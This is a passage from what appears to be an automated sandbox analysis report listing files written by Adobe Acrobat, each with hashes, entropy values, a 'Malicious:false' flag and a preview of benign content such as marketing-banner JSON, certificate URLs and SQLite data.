                                                                                            SHA-256:F9285359D3831AA3305D77B6D9592DA6570944F0C81308F97E889D1F3744669D
                                                                                            SHA-512:EF8E11C489A639597ADDBD2AC667847329FD1CBF8275AFAB76C1D5CAC90912605A1343B0C1FE0221D11DBFB0C9251F8B82F54B113F427605A90206594E9D3005
                                                                                            Malicious:false
                                                                                            Preview:p...... .........!.Y.R..(....................................................... ..........W....&...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:data
                                                                                            Category:modified
                                                                                            Size (bytes):328
                                                                                            Entropy (8bit):3.111644377766766
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:kK1cbT9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:DDnLNkPlE99SNxAhUe/3
                                                                                            MD5:E7C4A46E4713D9EBA57181AAE30A67DD
                                                                                            SHA1:3943301213C2BC971A4A51EFA533121715BD3226
                                                                                            SHA-256:052BFAF0B1B32900B1157BD8D2FABB57D12CE3F52C77BF5669869F5464AA395E
                                                                                            SHA-512:6311A2E4FDCB964C73CF1336EE6400C6405B3F6751232BE9FD9ACAF76FC1AF6B2B7921B4AD9D480E3D83AF079AAA3BA81EF10FC47DACA0560740943A8B986F70
                                                                                            Malicious:false
                                                                                            Preview:p...... ...........l.R..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):295
                                                                                            Entropy (8bit):5.337674492631912
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXBi/2kY+FIbRI6XVW7+0YCDoAvJM3g98kUwPeUkwRe9:YvXKXBA2WYpW7DsGMbLUkee9
                                                                                            MD5:E4195F3C18C0CA74ACC6C780EB7BC033
                                                                                            SHA1:4293133A0D1E3BF109581FEB830E4EA7DDE8B73C
                                                                                            SHA-256:FB1881C0B43C409076B7C1381A0166B330B915E051E18F5936B8A92937A32206
                                                                                            SHA-512:112E4C7124CBF2702BBA749D700754D9846FEAD2357AAF785E9AEFC438D607B3D0FE6727045FE652C025CA12C73459FFFD38E72E1D9F4CBBA3D017E3EB70F539
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"60006622-2faa-41f5-824e-b05a897b1bfb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734782538340,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):294
                                                                                            Entropy (8bit):5.276485929430291
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXBi/2kY+FIbRI6XVW7+0YCDoAvJfBoTfXpnrPeUkwRe9:YvXKXBA2WYpW7DsGWTfXcUkee9
                                                                                            MD5:2536F03169576F71D9931769B297EC68
                                                                                            SHA1:48E4ED08AFBD0227B83EAB628DB571397AD4BC97
                                                                                            SHA-256:01E99381DCD44DFFE89EF8C973F502C74E123D07BB4C67DC59403B1DC68B0F79
                                                                                            SHA-512:87F619974A6268F7A27E0D4C0DD020A360D9E81FFB816A8BAAAEBB9DA1AB1038FC0378FFF0CC7F2ED40FBEC0ECF4583D14F5EE3934958210818E95F584681955
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"60006622-2faa-41f5-824e-b05a897b1bfb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734782538340,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):294
                                                                                            Entropy (8bit):5.255683677399495
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXBi/2kY+FIbRI6XVW7+0YCDoAvJfBD2G6UpnrPeUkwRe9:YvXKXBA2WYpW7DsGR22cUkee9
                                                                                            MD5:31DAD0126E2245E4751F7D4C199145F6
                                                                                            SHA1:03AC2F41B88F27715DD1DAB5F7934DEFBE9DDD6A
                                                                                            SHA-256:7278B4D4D18C46D02F5A1CC6ADCAF7F3C647CEB70BEB65EEF5C7B9C9DCABCF27
                                                                                            SHA-512:FE25827B9F6570E17AA8168CA2DCE84290E47D01907C116A80B84B9AA8F36C961F694996A639E35BBD8C9195A419BCF8CE74FB6503E881CB80DFC711BB1B76A0
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"60006622-2faa-41f5-824e-b05a897b1bfb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734782538340,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):285
                                                                                            Entropy (8bit):5.315666005595136
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXBi/2kY+FIbRI6XVW7+0YCDoAvJfPmwrPeUkwRe9:YvXKXBA2WYpW7DsGH56Ukee9
                                                                                            MD5:B7FDD449988AFAF6AAC3C7CA49461772
                                                                                            SHA1:2B29CB70F1224676522E61988E07B3CD5FFAC6A5
                                                                                            SHA-256:2CA69EC38D7F42F6025C3F5542AAC64AF0A90A31AF521BD2ACFD568FDB8C2CF4
                                                                                            SHA-512:9B8D748D53FF586F9A01D8F1E8A9803E62FE19DDEC98782468148E8ECCB8FD8E4B42B1865D09CC589E0646837CE6A18161343237CB44A1374B81598B9B51264A
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"60006622-2faa-41f5-824e-b05a897b1bfb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734782538340,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):1123
                                                                                            Entropy (8bit):5.690620420952462
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:Yv6XBbi1pLgE9cQx8LennAvzBvkn0RCmK8czOCCSw1:YvEm1hgy6SAFv5Ah8cv/w1
                                                                                            MD5:31856526007C6E602937EF92A187C81D
                                                                                            SHA1:99D281C9D352B733580999D4AFBAC701F24FB201
                                                                                            SHA-256:3FC020D1655B27DF43C0D7FD210FFDE2937900A91355F9C3A835F228576705C4
                                                                                            SHA-512:F51CBE8988E2B4993F097DBBF187177E2FE50BE3303A7C3145FF6AFE001618814FB11DAA162D7623374DEEB5CB8C8D860144FD7B7495FDAA8032C84799584107
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"60006622-2faa-41f5-824e-b05a897b1bfb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734782538340,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):289
                                                                                            Entropy (8bit):5.264430585717715
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXBi/2kY+FIbRI6XVW7+0YCDoAvJf8dPeUkwRe9:YvXKXBA2WYpW7DsGU8Ukee9
                                                                                            MD5:39914BE3983121E1836A01ACA6F93528
                                                                                            SHA1:7CE6793C231FF1D7F5A55DE048AA7DFCB0F0ACDA
                                                                                            SHA-256:54A593F8F0DC7B0B3EB70AECE3D237F88FD2283A768183BAA5F9C8D2056B61FA
                                                                                            SHA-512:6D208C8FF7C4303296655674468EEE6C31AC6D2D11308914281826F96424FF35468DB6EC34AAE876F77E441B16DC3EFEDEEA6AE169C2F42FE697B5432DBE9E24
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"60006622-2faa-41f5-824e-b05a897b1bfb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734782538340,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):292
                                                                                            Entropy (8bit):5.26635102311422
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXBi/2kY+FIbRI6XVW7+0YCDoAvJfQ1rPeUkwRe9:YvXKXBA2WYpW7DsGY16Ukee9
                                                                                            MD5:D25B7A68922E403A74702D96732B5E8F
                                                                                            SHA1:C134A2352A04221748DF5F3BA13E796D0F7A4853
                                                                                            SHA-256:3EC4C174166FF9765F9C821EABFE9FE56D75B643F19AE6BB84DF9A954FB9E0CF
                                                                                            SHA-512:9950BCD156A61ED58E3CEC0D6C7750BF9B8DC91386A37C5B839367388CC3EA8DAF4C3EB35CA9F3A22A0669BC4BEA64322012991A71E799F63F9D09395EE8E742
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"60006622-2faa-41f5-824e-b05a897b1bfb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734782538340,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):289
                                                                                            Entropy (8bit):5.286158302998659
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXBi/2kY+FIbRI6XVW7+0YCDoAvJfFldPeUkwRe9:YvXKXBA2WYpW7DsGz8Ukee9
                                                                                            MD5:AF167A34F7412D306C5B4D609848C21C
                                                                                            SHA1:4A78EF1AEB77B1A8717AE112BE0BA4E15166FFCF
                                                                                            SHA-256:1C1D366E47CEB6FA2D9305CD5AC07FCFD29696364D6125C33D676FCDE5254FC6
                                                                                            SHA-512:6E1C51818DF69D170F15807F71B792B450911E3A9051AF2C544026051D4A6C996F00FCC198302C5A89CB96EC1268BD9940F33BA0CFF99104BDA8FF37EE0BB776
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"60006622-2faa-41f5-824e-b05a897b1bfb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734782538340,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):295
                                                                                            Entropy (8bit):5.2913020948981595
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXBi/2kY+FIbRI6XVW7+0YCDoAvJfzdPeUkwRe9:YvXKXBA2WYpW7DsGb8Ukee9
                                                                                            MD5:F2E34DBD26054CE6E146E1F01B995580
                                                                                            SHA1:4B0B12B13669212DA47DF1A0CD7882D5CE8C1D5D
                                                                                            SHA-256:C6619624DEC989CC62C201BA370B09642AABDCFAB5B1626098F39EAA79F697F1
                                                                                            SHA-512:C0B292BFCB3D820166939DEB2DACEAC5772890D45A90CDEB78FBEBCCC6BB2B279E33F8694EEC1789B009E5024DBAA53553DFD53EF56A2D7C6FCBA49AD27F679C
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"60006622-2faa-41f5-824e-b05a897b1bfb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734782538340,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):289
                                                                                            Entropy (8bit):5.271640722961253
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXBi/2kY+FIbRI6XVW7+0YCDoAvJfYdPeUkwRe9:YvXKXBA2WYpW7DsGg8Ukee9
                                                                                            MD5:B33301550F7E47166EFEA4E8BCC61188
                                                                                            SHA1:2E6790801534BACCAFD6F8A94B8C4FB9D7E52C7D
                                                                                            SHA-256:98BDA9233F8417517A1FF6752B67DF3908A845546BED3D2C46BA91BDB6F663AF
                                                                                            SHA-512:A4146794F426AECECC9E89902B3304FD5C8FB3F47AEAC14671684DC7AE7F449CBAC6153C087A2EAD8A99B3742B76EA57DAA1DFBCA50777DCCEF21CDD401D100E
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"60006622-2faa-41f5-824e-b05a897b1bfb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734782538340,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):284
                                                                                            Entropy (8bit):5.25719181273767
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXBi/2kY+FIbRI6XVW7+0YCDoAvJf+dPeUkwRe9:YvXKXBA2WYpW7DsG28Ukee9
                                                                                            MD5:4D27E2AD3AC99A5D6C84D8261F06F79D
                                                                                            SHA1:96C3DFC8862FE392487ABD387ED3731250EA902C
                                                                                            SHA-256:030F17B7988215A6F98565D8A88D44D474883F9F1F4C747619CAB48858BE9C68
                                                                                            SHA-512:CDCE282E0357E7A1D3B85845FDC66BAB118B6A4B70FBDF5450F73B936AE5DE2B983D6532121E4CCD50E8B7E4B7664F81F2FD03F0B5A2F1C143C56971C625BB85
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"60006622-2faa-41f5-824e-b05a897b1bfb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734782538340,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):291
                                                                                            Entropy (8bit):5.255382729755658
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXBi/2kY+FIbRI6XVW7+0YCDoAvJfbPtdPeUkwRe9:YvXKXBA2WYpW7DsGDV8Ukee9
                                                                                            MD5:4B57851E1E785563168D16C4816A878E
                                                                                            SHA1:B0FE14D3A14B25501A3E2D135BA0C5B1B9B18A0F
                                                                                            SHA-256:3E2885E441DBB32F76398E93EB97E9769D6B117BC4A013BA5FE25343917611AE
                                                                                            SHA-512:5F1FE37E5C54F1CBC065BAF2E11A024CF3CDDFF08B46A52AD6B2ECC4CBAE526EC99EDDB2CA0727D00914E72259D617E3F958B619C123AA726DD142398EA17FB7
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"60006622-2faa-41f5-824e-b05a897b1bfb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734782538340,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):287
                                                                                            Entropy (8bit):5.256959279881444
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXBi/2kY+FIbRI6XVW7+0YCDoAvJf21rPeUkwRe9:YvXKXBA2WYpW7DsG+16Ukee9
                                                                                            MD5:351DCCD57A894AD2F3D6717D4EEF86D1
                                                                                            SHA1:4C6E2FCE79340F959EB905C919C4DE783588FCFD
                                                                                            SHA-256:4C13C97CF06B944959959632DF4C222BBE216CFA5A669018407564B123F44DCF
                                                                                            SHA-512:EE957EC042E620B5DB0C6A90B2405609B8D65445B145907F76E6F8299603EF5F9BEE44B5BE0F465907ABF86EE763FA466338940440795A16C0ED16187A9C17F3
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"60006622-2faa-41f5-824e-b05a897b1bfb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734782538340,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):1090
                                                                                            Entropy (8bit):5.661432533643792
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:Yv6XBbitamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSw1:YvEmBBgkDMUJUAh8cvMw1
                                                                                            MD5:D0ECCA98F0C890053561EEBEE95371DD
                                                                                            SHA1:65D0C8CEA9A1BEADDE10D4E068B46B4CE6701D1A
                                                                                            SHA-256:768B8DF3A3DD9AF94BAD36ECF9D0906E89C5513144E8AD9FBB9478AC639D89DB
                                                                                            SHA-512:DFE6CBEAE7C32184B83F1E0F45B459BC988C2E378D97D960D9E101CEC2D50ED687DA865C4B0D7F8D47B6F112C6F66EA670F5D0E55A88284E6F0D1CF4D419F5E7
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"60006622-2faa-41f5-824e-b05a897b1bfb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734782538340,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):286
                                                                                            Entropy (8bit):5.2331721708244565
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXBi/2kY+FIbRI6XVW7+0YCDoAvJfshHHrPeUkwRe9:YvXKXBA2WYpW7DsGUUUkee9
                                                                                            MD5:8D787CE6F319D30E52E6B886F9DB6664
                                                                                            SHA1:867EE02CA48B35F538F1EEE79957ABF1852C5780
                                                                                            SHA-256:A38E2C01278EE0A6E190F5E8D62C5A3E18478B40B4CC0FCB28CB3C448AF5033E
                                                                                            SHA-512:C24F59382D47F0343C8EB4C5AAF6C8967A907B5433543370AD03ED741625EF512D976D7F0C17F883AB5967ACD98B42FFB59423F8DB87F4BDB27CDEA8B3B4B095
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"60006622-2faa-41f5-824e-b05a897b1bfb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734782538340,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):282
                                                                                            Entropy (8bit):5.237754531774581
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXBi/2kY+FIbRI6XVW7+0YCDoAvJTqgFCrPeUkwRe9:YvXKXBA2WYpW7DsGTq16Ukee9
                                                                                            MD5:C62DB6081BD49F9047533EE70D81AB84
                                                                                            SHA1:B38EA02C1D09DF3E7C9A42DBBA0FF725752FE857
                                                                                            SHA-256:87C88338D2C4473BA98909B7D01CCEF844ED23043E43D122A6F1F2DB904E355B
                                                                                            SHA-512:90CCAF9C4ADCD56E6CC3394B58A97D8B7C4CECE2848D41E9368F83BACD411AEE635EFC2B034338C243C7CE8F0A55DC11EBBF15CDBA77857619BA54A405224A3D
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"60006622-2faa-41f5-824e-b05a897b1bfb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734782538340,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):4
                                                                                            Entropy (8bit):0.8112781244591328
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:e:e
                                                                                            MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                            SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                            SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                            SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                            Malicious:false
                                                                                            Preview:....
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):2814
                                                                                            Entropy (8bit):5.126943943536736
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:Y/d2HqU6DWa/OuiptR/9fS8WKJMk+c7RQ89hMGK:GbU6Tip9WKKyO
                                                                                            MD5:7964595FD8746371146F1B3B95FE3137
                                                                                            SHA1:BE964AA7ABF0850257A051FEE2F1539E87CE3706
                                                                                            SHA-256:3D814DEEA520BD1BBCDB43A6AE431010A05C75F8E36E92B6137520B630C3FDF9
                                                                                            SHA-512:80E9A4E474CF602329A6E1C37A9CE8F36412CD3B7D093665851264B6321C12EC79DBB9FA301FAF1866CCDDAB14F41B83773EAF8E14F1D6AB0EEFD6A0981EF7E9
                                                                                            Malicious:false
                                                                                            Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"109ef4a4471f4b5119857b0a8fe8d190","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734609093000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"a96577b69a5f848e3efa93c1dc915370","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734609092000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"fd3c76e5193f838a8175ecfc3ef51609","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734609092000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"8411618e307f08af273c0c719a749d71","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734609092000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"ec98e714cc0e1f58fe4dfbdc7792811e","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734609092000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"da1f161d9f98f15580b92175a07d3327","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                                                                                            Category:dropped
                                                                                            Size (bytes):12288
                                                                                            Entropy (8bit):0.985230731706929
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:TLHRx/XYKQvGJF7urs6I1RZKHs/Ds/SpEg4zJwtNBwtNbRZ6bRZ4VgF:TVl2GL7ms6ggOVpgzutYtp6Pr
                                                                                            MD5:524FC3D2F3910A580D5435AFBF1EE83E
                                                                                            SHA1:B28008F698AF65739C5D8CA92B0C988D27DDE8DC
                                                                                            SHA-256:CD509FECA8BC41CED5619876632A088EDB5D1D19E82264A7E27EAF74E905B78B
                                                                                            SHA-512:F3C3E2DF3A422B91B4A63061E4DE490B41368E7F4C31D9E196D4D48B4FCB198209C1BFA9745219874904C701BE86281245935D5E4F6F5493B52295201388E6D4
                                                                                            Malicious:false
                                                                                            Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:SQLite Rollback Journal
                                                                                            Category:dropped
                                                                                            Size (bytes):8720
                                                                                            Entropy (8bit):1.3397472989185633
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:7+tEvAD1RZKHs/Ds/SpEgPzJwtNBwtNbRZ6bRZWf1RZK4qLBx/XYKQvGJF7ursI:7MSGgOVpHzutYtp6PMdqll2GL7msI
                                                                                            MD5:814D46FA24CAC873608DE214ED7C44F2
                                                                                            SHA1:78856FF0D2986E49D292336DDC9EB31B17926E97
                                                                                            SHA-256:81B49B97A920D8DFD8F9977994A5CCFC27413AFA9D3CC8487F7954219562EB7D
                                                                                            SHA-512:4D0E3E92FB149348C4337B8981B508F77B6C6186DD63DDAAFC75CAA0E04E438AA03C9243CF12EF39457CA106E70776A16D7FDD562D852AE5DF139FA86BAB833E
                                                                                            Malicious:false
                                                                                            Preview:.... .c.....).........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):66726
                                                                                            Entropy (8bit):5.392739213842091
                                                                                            Encrypted:false
